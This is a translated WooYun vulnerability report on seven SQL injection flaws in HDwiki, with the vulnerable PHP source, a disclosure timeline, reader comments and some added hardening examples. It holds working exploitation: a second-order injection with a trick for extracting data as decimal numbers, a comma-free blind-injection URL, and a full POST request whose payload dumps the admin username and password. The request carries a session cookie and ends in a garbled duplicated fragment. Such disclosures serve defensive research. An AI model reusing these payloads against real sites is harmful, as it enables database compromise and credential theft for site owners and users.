Defect ID: WooYun-2014-088004
Title: Hdwiki (20141205) has 7 SQL injection vulnerabilities (including previously mishandled ones)
Vendor: 互动在线(北京)科技有限公司
Author: ′雨。
Submitted: 2014-12-22 19:26
Published: 2015-04-02 10:23
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 20
Status: Vendor was notified but chose to ignore the vulnerability
Tags:
2014-12-22: Details sent to the vendor, awaiting vendor response
2014-12-27: Vendor chose to ignore the vulnerability; details opened to third-party security partners (NSFOCUS, 唐朝安全巡航, 无声信息)
2015-02-20: Details disclosed to core white hats and domain experts
2015-03-02: Details disclosed to regular white hats
2015-03-12: Details disclosed to intern white hats
2015-04-02: Details disclosed to the public
I saw that a new version was released; a few old holes still have not been fixed, so I am throwing them in here as well.

0x01 In control/comment.php
```php
function doreport(){
    $usernames=array();
    $id=intval($this->post['id']) ? $this->post['id'] : 0;
    $report=trim(htmlspecialchars(WIKI_CHARSET==GBK?string::hiconv($this->post['report']):$this->post['report']));
    if(empty($id)||empty($report)){
        $this->message(-1,'',2);
    }
    $users=$_ENV["user"]->get_users('groupid',4);
    if(!(bool)$users){
        $this->message(-2,'',2);
    }else{
        foreach($users as $user){
            $usernames[]=$user['username'];
        }
    }
    $sendto=join(',',$usernames);
    $subject=$this->view->lang['commentReportObj'];
    if($this->user['uid']=='0'){
        $from=$this->ip;
    }else{
        $from=$this->user['username'];
    }
    $comment=$this->db->fetch_by_field('comment','id',$id); // a row is read back out of the database here
    if(!(bool)$comment){
        $this->message(-1,'',2);
    }
    $doc=$this->db->fetch_by_field('doc','did',$comment['did']);
    $doc['title'] =htmlspecialchars(stripslashes($doc['title']));
    $report=$this->view->lang['commentCom'].$this->view->lang['commentUser'].$comment['author'].'<br/>'
        .$this->view->lang['commentCom'].$this->view->lang['commentTime'].$this->date($comment['time'])."<br/>"
        .$this->view->lang['commentId'].$comment['id'].'<br/>'.$this->view->lang['commentsDocTitle'].$doc['title']."<br/>"
        .$this->view->lang['commentContent'].$comment['comment'].'<br/>'
        .$this->view->lang['commentReportReason'].$report; // the $comment row fetched from the database is written into $report here
    $sendarray = array(
        'sendto'=>$sendto,
        'subject'=>$subject,
        'content'=>$report, // carried along in the array
        'isdraft'=>1,
        'user'=>$this->user
    );
    $_ENV['pms']->send_ownmessage($sendarray);
```
```php
function send_ownmessage($sendarray){
    $pmsresult = true;
    $isdraft = ($sendarray['isdraft'] === 'on')? 1 : 0;
    $userinfo = $this->check_recipient($sendarray['sendto'],1);
    $num = count($userinfo);
    if($num > 0){
        $pmsquery = "INSERT INTO ".DB_TABLEPRE."pms (`from`,`fromid`,`drafts`,`toid`,`to`,`subject`,`message`,`time`,`new`) VALUES ";
        for($i=0; $i<$num; $i++){
            $pmsquery .= "('".$sendarray['user']['username']."','".$sendarray['user']['uid']."','".$isdraft."','".$userinfo[$i]['uid']."','".$userinfo[$i]['username']."','".$sendarray['subject']."','".$sendarray['content']."','".$this->base->time."',1),"; // no filtering: concatenated straight into the INSERT
        }
        $pmsquery = substr($pmsquery,0,-1) . ';';
        $pmsresult = $this->db->query($pmsquery);
    }
    return $pmsresult;
}
```
```
Comments on this entry (1 in total)   Back to entry
xiaoyu  Time: 12-19 00:47  test'      // pick any entry and first leave a comment ourselves; here the comment is test'
// then click "report" and look at the statement that gets executed
INSERT INTO wiki_pms (`from`,`fromid`,`drafts`,`toid`,`to`,`subject`,`message`,`time`,`new`) VALUES ('xiaoyu','2','0','1','admin','评论举报专用','评论作者:xiaoyu<br/>评论时间:12-19 00:47<br/>评论ID:8<br/>评论词条名:xiaoyuxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxasd<br/>评论内容:test'<br/>举报原因teet','1418921320',1)
评论内容:test'   <- the stored comment comes back out of the database here.
```
Figuring out how to get the result echoed back here took me a long time.

```
INSERT INTO wiki_pms (`from`,`fromid`,`drafts`,`toid`,`to`,`subject`,`message`,`time`,`new`) VALUES ('xiaoyu','2','0','1','admin','评论举报专用','评论作者:xiaoyu<br/>评论时间:12-19 00:47<br/>评论ID:8<br/>评论词条名:xiaoyuxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxasd<br/>评论内容:test'<br/>举报原因teet','1418921320',1)
```

The content of our `message` column is displayed back where the mail is sent: it goes to the administrator, but we can also see it in our own outbox. After `message` only `time` and `new` remain, neither of which is displayed, and hdwiki has no MySQL error output, so nothing errors out. Blind injection through this second-order injection would be very tedious, so I looked for a way to get the data out directly.

```
INSERT INTO wiki_pms (`from`,`fromid`,`drafts`,`toid`,`to`,`subject`,`message`,`time`,`new`) VALUES ('xiaoyu','2','0','1','admin','评论举报专用','评论作者:xiaoyu<br/>评论时间:12-19 00:47<br/>评论ID:8<br/>评论词条名:a<br/>评论内容:test'+123,1,1)#<br/>举报原因teet','1418921320',1)
```

Comment content: test'+123. In MySQL `+` cannot concatenate strings; it can only add a number, and letters cannot be added in. My first thought was hex, but hex still contains letters. The next idea was to convert the hex to decimal, since decimal has no letters in it. The complete version then is:

After reporting, go to your own outbox. The listing shows Subject / Recipient / Time as 评论举报专用 admin 01-01 08:00 1919905652, with Forward / Delete / Close links, so the sent message is visible there. Look at 1919905652: converting it to hex gives 726f6f74; prefix it as 0x726f6f74 and decode the hex back to get root. The number of characters extracted per pass cannot be too large, or the number becomes too big and errors out.

0x02 control/doc.php
```php
function docheckrecipient(){
    $sendto = $this->post['sendto'];
    if (WIKI_CHARSET == 'GBK'){
        $sendto = string::hiconv($sendto,'GBK','UTF-8',1); // charset conversion
    }
    $send = explode(',',$sendto);
    if(count($send)>10){
        $this->message($this->view->lang['fullsend'],'',2);
    }
    $checkreturn = $_ENV['pms']->check_recipient($sendto,0);
    $message = ($checkreturn === true)? 'OK' : ($checkreturn.' '.$this->view->lang['loginTip3']);
    $this->message($message,'',2);
}
```
```php
function hiconv($str,$to='',$from='',$force=false) {
    if (empty($str)) return $str;
    if(!preg_match( '/[\x80-\xff]/', $str)) return $str; // is contain chinese char
    if(empty($to)){
        if ('utf-8' == strtolower(WIKI_CHARSET)){
            return $str;
        }
        $to=WIKI_CHARSET;
    }
    if(empty($from)){
        $from = ('gbk'==strtolower($to)) ? 'utf-8':'gbk';
    }
    $to=strtolower($to);
    $from=strtolower($from);
    //$isutf8=preg_match( '/^([\x00-\x7f]|[\xc0-\xdf][\x80-\xbf]|[\xe0-\xef][\x80-\xbf]{2}|[\xf0-\xf7][\x80-\xbf]{3})+$/', $str );
    $re = strlen($str) > 6 ? '/([\xe0-\xef][\x80-\xbf]{2}){2}/' : '/[\xe0-\xef][\x80-\xbf]{2}/';
    $isutf8 = preg_match($re, $str);
    //$force = (substr($to, 0, 3) == 'utf') ? true : $force;
    if(!$force && $isutf8 && $to=='utf-8' ) return $str; // only when force is 1 does this not return; at our call site force happens to be 1
    if(!$force && !$isutf8 && $to=='gbk' ) return $str;
    if (function_exists('iconv')){
        $str = iconv($from, $to, $str); // charset conversion: wide byte, bypasses the escaping backslash
    }else{
        require_once(HDWIKI_ROOT.'/lib/Chinese.class.php');
        $ch = new chinese($from,$to);
        if('utf-8'==$from){
            $str = addslashes($ch->convert(stripslashes($str)));
        }else{
            $str = $ch->convert($str);
        }
    }
    return $str;
}
```
```php
function check_recipient($sendto, $type){
    $userinfos = array();
    $send = array_unique(explode(',', $sendto)); // the comma is replaced below, so commas cannot be used in the payload
    sort($send);
    $num = count($send);
    $sendto = str_replace(",", "','", $sendto);
    $query = $this->db->query("SELECT username,uid FROM ".DB_TABLEPRE."user WHERE username IN ('$sendto')");
    if($this->db->num_rows($query) == $num && $type != 1){
        return true;
    }
```
Blind injection it is:

```
http://web/dan/hdwiki//index.php?pms-checkrecipientsendto=a%E9%8C%A6%27) or CASE WHEN(substr((select username from wiki_user where uid=1) from 1 for 1) in (char(97))) THEN (1) ELSE (0) end limit 1#
```

This is a blind-injection statement that avoids the comma. 97 is the character a: when the first character is a, the response is OK; when it does not match, it simply returns an error. Write a script to run through it; the check is trivial.

0x03 In control/doc.php
```php
function dochangename(){
    $ajaxtitle = trim($this->post['newname']);
    if(string::hstrtoupper(WIKI_CHARSET)=='GBK'){
        $ajaxtitle=string::hiconv($ajaxtitle,'gbk','utf-8','true'); // force is 1: the conversion bypasses the escaping backslash
    }
    $title=string::substring(string::stripscript($_ENV['doc']->replace_danger_word(trim($ajaxtitle))),0,80);
    if(@!is_numeric($this->post['did'])){
        $this->message("-1","",2);
    }elseif($ajaxtitle!=string::stripscript($ajaxtitle)){
        $this->message("-3","",2);
    }elseif(!$title){
        $this->message("-4","",2);
    }elseif(@(bool)$this->db->fetch_by_field('doc','title',$title)){ // used in a query here
        $this->message("-2","",2);
    }elseif(@(bool)$this->db->fetch_by_field('synonym','srctitle',$title)){
        $this->message("-5","",2);
    }elseif($_ENV['doc']->change_name($this->post['did'],$title)){
        $_ENV['synonym']->synonym_change_doc($this->post['did'],$title);
        // notify
        if(1 == $this->setting['cloud_search']) {
            // edit notification
            $_ENV['search']->cloud_change(array('dids'=>$this->post['did'],'mode'=>'2'));
        }
```
This one is much the same as the previous one, so I will not say more.

0x04 control/edition.php
```php
function doremove(){
    $did=isset($this->post['did'])?$this->post['did']:$this->get[2];
    $eids=isset($this->post['eid'])?$this->post['eid']:array($this->get[3]); // comes from POST
    foreach($eids as $eid){
        if(!is_numeric($eid)&&!is_numeric($did)){
            // checks whether the value is numeric and returns an error if not. The problem is that the
            // foreach only runs when $eids is an array; if it is not an array this check is never reached,
            // so we simply submit a plain string
            $this->message($this->view->lang['parameterError'],'BACK',0);
        }
    }
    $result=$_ENV['doc']->remove_edition($eids, $did); // used in a query
```
```php
function remove_edition($eid, $did=0){
    if(is_array($eid)){
        $eid=implode(",",$eid);
    }
    $sql="INSERT INTO ".DB_TABLEPRE."recycle (type,keyword,content,file,adminid,admin,dateline) values ";
    $query=$this->db->query("SELECT * FROM ".DB_TABLEPRE."edition WHERE eid IN ($eid)"); // eid is not quoted here
    $delete_count = array();
    while($edition=$this->db->fetch_array($query)){
```
0x05 Still in control/edition.php
```php
function doexcellent(){
    foreach(@$this->post['eid'] as $eid){
        if(!is_numeric($eid)){ // the same logic error
            $this->message($this->view->lang['parameterError'],'BACK',0);
        }
    }
    $result=$_ENV['doc']->set_excellent_edition($this->post['eid']);
```
```php
function set_excellent_edition($eid,$type=1){
    if(is_array($eid)){
        $eid=implode(",",$eid);
    }
    $type=(bool)$type?1:0;
    $this->db->query("UPDATE ".DB_TABLEPRE."edition SET excellent=$type WHERE eid IN ($eid)"); // still no quotes, injectable
    return true;
```
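The scalar-versus-array gap in doremove()/doexcellent() and the unquoted IN (...) in remove_edition()/set_excellent_edition() share one fix: normalise the parameter to a list of integers before it goes anywhere near SQL. The following is an added example and not HDwiki's code; the wiki_edition table name is assumed from the wiki_ prefix that appears in the report.

```php
<?php
// Added example (not HDwiki's code): normalise an eid parameter that may arrive
// as a scalar or as an array before it is interpolated into an IN (...) clause.

/**
 * Returns the ids as integers, or null if any element is not a plain decimal
 * integer. Behaves the same whether $eid is a string, an int or an array, so
 * the check cannot be skipped by sending a scalar where the original foreach
 * expected an array.
 */
function normalizeIdList($eid): ?array
{
    $items = is_array($eid) ? $eid : [$eid];
    $ids = [];
    foreach ($items as $item) {
        if (!is_int($item) && !is_string($item)) {
            return null;            // nested arrays, null, floats: reject
        }
        $s = (string) $item;
        // is_numeric() would also accept "1e3", " 5" or "1.0"; ctype_digit() does not
        if ($s === '' || !ctype_digit($s) || ($s[0] === '0' && strlen($s) > 1)) {
            return null;
        }
        $ids[] = (int) $s;
    }
    return $ids === [] ? null : array_values(array_unique($ids));
}

/** Builds the IN (...) fragment from integers only, never from raw request data. */
function buildInClause(array $ids): string
{
    return 'IN (' . implode(',', array_map('intval', $ids)) . ')';
}

/**
 * Hardened counterpart of set_excellent_edition(): returns the statement it
 * would run, or null when the caller should answer with parameterError.
 */
function excellentEditionSql($eid, $type = 1): ?string
{
    $ids = normalizeIdList($eid);
    if ($ids === null) {
        return null;
    }
    $flag = $type ? 1 : 0;
    return 'UPDATE wiki_edition SET excellent=' . $flag . ' WHERE eid ' . buildInClause($ids);
}

// Constructed inputs: the array form, a comma-separated scalar that the original
// code would have passed straight through implode()/IN (...), and a clean scalar.
$cases = [['1', '2', '2'], '7,8', '7'];
foreach ($cases as $case) {
    echo json_encode($case), ' => ', excellentEditionSql($case) ?? 'rejected', "\n";
}
```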
Much the same as the one above; nothing more to add.

0x06 In control/doc.php
```php
function docreate(){
    if(4 != $this->user['groupid'] && ($this->time-$this->user['regtime'] < $this->setting['forbidden_edit_time']*60)){
        $this->message($this->view->lang['editTimeLimit1'].$this->setting['forbidden_edit_time'].$this->view->lang['editTimeLimit2'],'BACK',0);
    }
    if($this->setting['verify_doc'] == -1) { // first-edit review
        if($this->setting['max_newdocs'] != 0 && $this->user['newdocs'] >= $this->setting['max_newdocs']) {
            $this->message('您的首次可创建或编辑词条数的数量已达最大值,请等待管理员审核', 'BACK', 0);
        }
    }
    if($this->setting['checkcode']!=3 && $this->setting['doc_verification_create_code'] && strtolower($this->post['code'])!=$_ENV['user']->get_code()){
        $this->message($this->view->lang['codeError'],'BACK',0);
    }
    if(@trim($this->post['content'])==''||@trim($this->post['title'])==''){
        $this->message($this->view->lang['contentIsNull'],'BACK',0);
    }
    $doc['title']=string::substring(string::stripscript($_ENV['doc']->replace_danger_word(trim($this->post['title']))),0,80); // the key point: the POSTed title is truncated here
```

The idea is roughly this: suppose a piece of code keeps only 4 characters. We submit aaa', which is escaped to aaa\', and after truncation what is left is aaa\ . The same thing happens here.

```php
    $_doc=$this->db->fetch_by_field('doc','title',$doc['title']);
    if((bool)$_doc && !empty($_doc['content'])){
        $this->message($this->view->lang['createDocTip5'],'BACK',0);
    }
    if(!(bool)$_ENV['category']->vilid_category($this->post['category'])){
        $this->message($this->view->lang['categoryNotExist'],'BACK',0);
    }
    if((bool)$this->post['summary']){
        $doc['summary']=trim(strip_tags($_ENV['doc']->replace_danger_word($this->post['summary'])));
    }
    $doc['did']=intval($this->post['did']);
    $doc['letter']=string::getfirstletter($this->post['title']);
    $doc['category']=$this->post['category'];
    //$doc['tags']=$_ENV['doc']->jointags($this->post['tags']);
    $doc['tags']=$this->post['tags'];
    $doc['tags']=$_ENV['doc']->replace_danger_word($doc['tags']);
    $doc['tags'] = htmlspecialchars(string::stripscript($doc['tags']));
    $doc['content'] = $_ENV['doc']->replace_danger_word($this->post['content']);
    $doc['content'] = preg_replace('/(<embed.*?(?:allowscriptaccess)=)\\\?([\'"]?)(\w*?)\\\?\2(.*?>)/i','$1$2never$2$4',$doc['content']); // set the allowscriptaccess attribute of embed tags to never
    $doc['content'] = preg_replace('/(<embed(?:(?!allowscriptaccess).)+?)(>)/i','$1 allowscriptaccess="never" $2',$doc['content']); // if an embed tag has no allowscriptaccess attribute, add one set to never
    $doc['content'] = addslashes(string::stripscript(stripslashes($doc['content'])));
    $doc['content'] = $this->setting['auto_picture']?$_ENV['doc']->auto_picture($doc['content'],$doc['did']):$doc['content'];
    $doc['summary'] = trim(strip_tags($_ENV['doc']->replace_danger_word($doc['summary']))); // strip banned words
    $doc['summary'] = (bool)$doc['summary']?$doc['summary']:$doc['content'];
    $doc['summary'] = trim(string::convercharacter(string::substring(strip_tags($doc['summary']),0,100))); // strip line breaks and truncate the string
    $doc['summary'] = htmlspecialchars(addslashes(stripslashes(string::stripscript(strip_tags($doc['summary']))))); // strip special characters and javascript
    $doc['images']=util::getimagesnum($doc['content']);
    $doc['time']=$this->time;
    $doc['words']=string::hstrlen($doc['content']);
    $doc['visible']=$this->setting['verify_doc'] != 0 ? '0' : '1';
    if(strpos($this->user['regulars'], 'doc-immunity') === false && 4 != $this->user['groupid']) {
        if(!$_ENV['doc']->check_submit_interval($this->user['uid'])) {
            if($this->setting['save_spam']) {
                $doc['visible'] = 0;
            } else {
                $this->message(sprintf($this->view->lang['submit_interval_msg'], $this->setting['submit_min_interval']),"BACK",0);
            }
        }
        if(!$_ENV['doc']->check_eng_pcnt($doc['content']) || !$_ENV['doc']->check_extlink_pcnt($doc['content'])) {
            if($this->setting['save_spam']) {
                $doc['visible'] = 0;
            } else {
                $this->message($this->view->lang['spam_msg'],"BACK",0);
            }
        }
    }
    if(strpos($this->user['regulars'], 'doc-immunity') !== false || (4 == $this->user['groupid'] || !$this->setting['verify_doc'] ||$this->setting['verify_doc'] == -1 && $this->user['newdocs'] == -1)){
        $doc['visible'] = 1;
    }
    if($this->setting['verify_doc'] == -1) { // first-edit review
        if($this->user['newdocs'] != -1) {
            $_ENV['user']->update_newdocs($this->user['uid'], +1);
        }
    }
    if($doc['visible'] == 1){
        $_ENV['user']->add_credit($this->user['uid'],'doc-create',$this->setting['credit_create'],$this->setting['coin_create']);
    }
    /*foreach($this->post['tags'] as $search_tags){
        $doc['search_tags'] .=string::convert_to_unicode($search_tags).";";
    }*/
    $did=$_ENV['doc']->add_doc($doc); // right here: this is where it goes into the database
    $_ENV['user']->update_field('creates',$this->user['creates']+1,$this->user['uid']);
```

```php
function add_doc($doc) {
    $editions = ($this->base->setting['base_createdoc']==1)?1:0;
    $doc['title'] = trim($doc['title']);
    if ($doc['did']){
        $this->db->query("REPLACE INTO ".DB_TABLEPRE."doc
            (did,letter,title,tag ,summary ,content,author,authorid,time,lastedit,lasteditor,lasteditorid,visible,editions)
            VALUES (".$doc['did'].",'".$doc['letter']."','".$doc['title']."','".$doc['tags']."','".$doc['summary']."','".$doc['content']."',
            '".$this->base->user['username']."','".$this->base->user['uid']."',
            ".$doc['time'].",".$doc['time'].",'".$this->base->user['username']."','".$this->base->user['uid']."','".$doc['visible']."',$editions)");
        $did = $doc['did'];
        $this->db->query("DELETE FROM ".DB_TABLEPRE."autosave WHERE AND uid=".$this->base->user['uid']);
    }else{
        $this->db->query("INSERT INTO ".DB_TABLEPRE."doc
            (letter,title,tag ,summary ,content,author,authorid,time,lastedit,lasteditor,lasteditorid,visible,editions)
            VALUES ('".$doc['letter']."','".$doc['title']."','".$doc['tags']."','".$doc['summary']."','".$doc['content']."',
            '".$this->base->user['username']."','".$this->base->user['uid']."',
            ".$doc['time'].",".$doc['time'].",'".$this->base->user['username']."','".$this->base->user['uid']."','".$doc['visible']."',$editions)");
        $did = $this->db->insert_id();
        $this->add_doc_category($did, $doc['category']);
        $this->db->query("DELETE FROM ".DB_TABLEPRE."autosave WHERE AND uid=".$this->base->user['uid']);
    }
    if($this->base->setting['base_createdoc']==1){
        $this->db->query("INSERT INTO ".DB_TABLEPRE."edition
            (did,author,authorid,time,ip,title,tag,summary,content,words,images )
            VALUES ($did,'".$this->base->user['username']."','".$this->base->user['uid']."',
            '".$doc['time']."','".$this->base->ip."','".$doc['title']."','".$doc['tags']."','".$doc['summary']."','".$doc['content']."','".$doc['words']."','".$doc['images']."')");
    }
    return $did;
}
```
In `$doc['title']."','".$doc['tags']` the truncated title is immediately followed by a value that comes from POST, so this can be injected. Afterwards I noticed that this hole had already been submitted: http://**.**.**.**/bugs/wooyun-2010-081667. But I think the exploit that xxx gave is far from perfect; at least in my version `/*` does not work. In PHP `/*` comments out everything after it, but many MySQL versions need a closing `*/`. I was stuck on this statement for quite a while at first. Let us look at the statement first:

```
REPLACE INTO wiki_doc
(did,letter,title,tag ,summary ,content,author,authorid,time,lastedit,lasteditor,lasteditorid,visible,editions)
VALUES (56,'x','xiaoyuxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxasd\',',user(),1,1,1,1,1,1,1,1#','asd','<p>asd<br /></p>',
'xiaoyu','2',
1418925356,1418925356,'xiaoyu','2','1',0)
```

That is how it looks: it wraps onto new lines, and those line breaks are what makes this so painful. We know that `#` and `--` are single-line comments, while the multi-line `/*` needs a closing `*/` in MySQL, and what follows is outside our control, so it cannot be used. So we have to stick with a single-line comment. There are 14 columns in total, 8 of which come after the line break, so we must supply 6 columns before it. `56,'x','xiaoyuxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxasd\','` is three, so we build `56,'x','xiaoyuxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxasd\',',1,1,1`, which makes six. After the last 1 another `,` is needed, so that it joins onto the wrapped line, and then the rest of this line is commented out. The final statement is then:

```
REPLACE INTO wiki_doc
(did,letter,title,tag ,summary ,content,author,authorid,time,lastedit,lasteditor,lasteditorid,visible,editions)
VALUES (56,'x','xiaoyuxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxasd\',',concat(user(),0x23,version()),user(),(select concat(username,0x2c,password) from wiki_user where uid=1),#','asd','<p>asd<br /></p>',
'xiaoyu','2',
1418925356,1418925356,'xiaoyu','2','1',0)
```
```
POST /dan/hdwiki/index.php?doc-create HTTP/1.1
Host: web
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://web/dan/hdwiki/index.php?doc-create
Cookie: ECS[visit_times]=6; themeIndexTom=2; KT-GUID=KT-C3DD75C5698EA55255357D6602C6136C; KT-ADMIN=admin; 17cplastvisit=1418373539; 17cplastactivity=0; __utma=242480388.119574638.1418373557.1418373557.1418373557.1; __utmz=242480388.1418373557.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); hd_sid=7YD9xP; hd_auth=b37eKa64aWjTOOSABPRfh3bnxRh50jO7TfArgwNT1RGI1HzWq11B2XSpwCG%2BKaHUwNFm9NRHXZ2nR5JUNbvW
Content-Type: multipart/form-data; boundary=---------------------------41184676334
Content-Length: 1534

-----------------------------41184676334
Content-Disposition: form-data; name="did"

56
-----------------------------41184676334
Content-Disposition: form-data; name="section_id"


-----------------------------41184676334
Content-Disposition: form-data; name="create_submit"

1
-----------------------------41184676334
Content-Disposition: form-data; name="title"

xiaoyuxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxasd\
-----------------------------41184676334
Content-Disposition: form-data; name="category"

3
-----------------------------41184676334
Content-Disposition: form-data; name="content"

<p>asd<br /></p>
-----------------------------41184676334
Content-Disposition: form-data; name="letter"

asd
-----------------------------41184676334
Content-Disposition: form-data; name="tags"

,concat(user(),0x23,version()),user(),(select concat(username,0x2c,password) from wiki_user where uid=1),#
-----------------------------41184676334
Content-Disposition: form-data; name="code"


-----------------------------41184676334
Content-Disposition: form-data; name="publishsubmit"

·à2?
-----------------------------41184676334--
Content-Disposition: form-data; name="tags"

,user(),user(),user(),user(),1,1,1,1,1,1,1)#
-----------------------------491299511942
Content-Disposition: form-data; name="code"


-----------------------------491299511942
Content-Disposition: form-data; name="publishsubmit"

·à2?
-----------------------------491299511942--
```
Executed successfully.
The data comes straight out.

0x07 In control/pms.php
```php
function doblacklist(){
    if(isset($this->post['blacklist'])){
        $blacklist = htmlspecialchars(string::stripscript($this->post['blacklist']));
        if(empty($blacklist)){
            $result = $_ENV['pms']->remove_blacklist($this->user['uid']);
        }else{
            $result = $_ENV['pms']->add_blacklist($blacklist,$this->user['uid']);
```
```php
function add_blacklist($blacklist,$uid){
    return($this->db->query("REPLACE INTO ".DB_TABLEPRE."blacklist (uid,blacklist) VALUES('$uid','$blacklist')")); // into the database
}
```
```php
function dobox(){
    $this->get[3] = empty($this->get[3]) ? NULL : $this->get[3];
    $page = max(1,isset($this->get[4]) ? $this->get[4] : $this->get[3]);
    $num = isset($this->setting['list_prepage'])?$this->setting['list_prepage']:20;
    $start_limit = ($page - 1) * $num;
    $count = $_ENV['pms']->get_totalpms($this->user['uid'], $this->get[2]); // read back out of the database
```
```php
function get_blacklist($uid){
    $user = $this->db->fetch_first("SELECT blacklist FROM ".DB_TABLEPRE."blacklist WHERE uid='".$uid."'");
    return $user['blacklist'];
```
```php
$blackuser = str_replace(",","','",$blacklist);
if($group){
    $sqladd = ($group == 'owner') ? 'AND og=0' : 'AND og=1';
}
$query = "SELECT COUNT(*) num FROM ".DB_TABLEPRE."pms WHERE toid='$uid' AND delstatus!=2 AND drafts!=1 $sqladd AND `from`
```
This old hole has not been fixed either: http://**.**.**.**/bugs/wooyun-2010-067410. Give fixing it a try.

Filter, endlessly.
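As an added illustration of what that filtering has to look like (an added example, not the author's or HDwiki's code): escape once, at the query boundary, after truncation and after reading a value back from the database, which covers the truncated title in 0x06 and the re-inserted comment in 0x01. `$escape` stands in for mysqli::real_escape_string() on a connection configured with set_charset(); addslashes() is used only so the script runs without a database, and wiki_pms is the table name the report shows.

```php
<?php
// Added example (not HDwiki's code): escape at the query boundary, after every
// transformation of the value. In production pass [$mysqli, 'real_escape_string']
// as $escape after $mysqli->set_charset(...); addslashes() is charset-blind and
// only keeps this script runnable offline.

/** The order docreate() uses: the escaped value is cut to $maxLen bytes afterwards. */
function truncateAfterEscape(string $raw, int $maxLen, callable $escape = 'addslashes'): string
{
    return substr($escape($raw), 0, $maxLen);
}

/** Hardened order: cut the raw value first, then escape the value that is actually stored. */
function escapeAfterTruncate(string $raw, int $maxLen, callable $escape = 'addslashes'): string
{
    return $escape(mb_substr($raw, 0, $maxLen, 'UTF-8'));
}

/** True when the literal ends in an odd run of backslashes, i.e. its closing quote would be escaped. */
function endsWithUnpairedBackslash(string $literal): bool
{
    $trailing = strlen($literal) - strlen(rtrim($literal, '\\'));
    return $trailing % 2 === 1;
}

/**
 * Second-order case from doreport()/send_ownmessage(): a row fetched from the
 * comment table is concatenated into a new INSERT. Escape the fetched fields
 * again; "already stored" is not the same as "already escaped".
 */
function buildPmsInsert(array $row, callable $escape = 'addslashes'): string
{
    $cols = ['from', 'fromid', 'drafts', 'toid', 'to', 'subject', 'message', 'time', 'new'];
    $vals = [];
    foreach ($cols as $col) {
        $vals[] = "'" . $escape((string) $row[$col]) . "'";
    }
    return 'INSERT INTO wiki_pms (`' . implode('`,`', $cols) . '`) VALUES (' . implode(',', $vals) . ')';
}

// Constructed inputs: a 10-character title whose last character is a quote.
$limit = 10;
$title = "abcdefghi'";
$bad   = truncateAfterEscape($title, $limit);   // escaping adds an 11th byte, truncation strands the backslash
$good  = escapeAfterTruncate($title, $limit);   // the quote survives truncation and is then escaped
printf("truncate after escape: %-12s unpaired backslash: %s\n", $bad, endsWithUnpairedBackslash($bad) ? 'yes' : 'no');
printf("escape after truncate: %-12s unpaired backslash: %s\n", $good, endsWithUnpairedBackslash($good) ? 'yes' : 'no');

// A comment read back from the database still carries the quote the user typed.
$fetched = ['from' => 'xiaoyu', 'fromid' => 2, 'drafts' => 0, 'toid' => 1, 'to' => 'admin',
            'subject' => 'report', 'message' => "comment: test'", 'time' => 1418921320, 'new' => 1];
echo buildPmsInsert($fetched), "\n";
```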
Severity: No impact (vendor ignored)
Ignored at: 2015-04-02 10:23
None yet
Awesome!
A gift pack
Badass
Is 猪猪侠 here too?
OP didn't even split this into 7 reports... a credit to the industry.
@互动在线(北京)科技有限公司 is xwiki yours?
How did you bypass the defence??
Who's best at code auditing....
Judging by the recent status this is going to be ignored; top up the rank when that happens, @疯狗
@geekfree only GET has it, POST doesn't,
Oh, I see. Can the GET variant be bypassed?
@′雨。 can the GET variant be bypassed
@geekfree it depends on the specific spot. But I feel it generally can't be any more.
@′雨。 can I add you on QQ: 1963103788
Both GET and POST have defences, please share the trick
Most of these were posted before; only one hadn't been
? 1w : 4k
@roker I'm going to ignore you, idiot. -.-
@′雨。 I want alimony 🙁
@roker @′雨。 showing off your love every day.